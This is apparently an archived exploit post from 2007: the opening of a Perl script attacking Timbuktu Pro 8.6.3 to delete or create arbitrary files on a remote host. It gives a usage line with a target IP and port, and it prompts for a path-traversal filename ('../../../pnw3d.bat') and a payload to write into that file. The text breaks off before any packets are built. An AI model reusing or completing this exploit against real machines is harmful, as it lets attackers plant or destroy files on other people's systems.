timbuktu_sploit.txt
Posted on 26 September 2007
#!/usr/bin/perl #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # Timbuktu Pro 8.6.3 Arbitrary File Deletion/Creation # # Bug & Exploit by titon [titon{at}bastardlabs{dot}com] # # Advisory: # http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 # # Copyright: (c)2007 BastardLabs #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # # Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407 # #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO use IO::Socket; use Time::HiRes qw(usleep); ## ## we start in the C:Program FilesTimbuktu ProN1 folder ## $filename = &promptUser("Filename" ,"../../../pnw3d.bat"); $payload = &promptUser("Payload ","echo pwwwnnn333ddd !!"); ## ##payload can be either text or binary (in x42x69x42 format) ## $payload =~ s/\x(..)/pack("C",hex($1))/egi; ## ## packet1 == â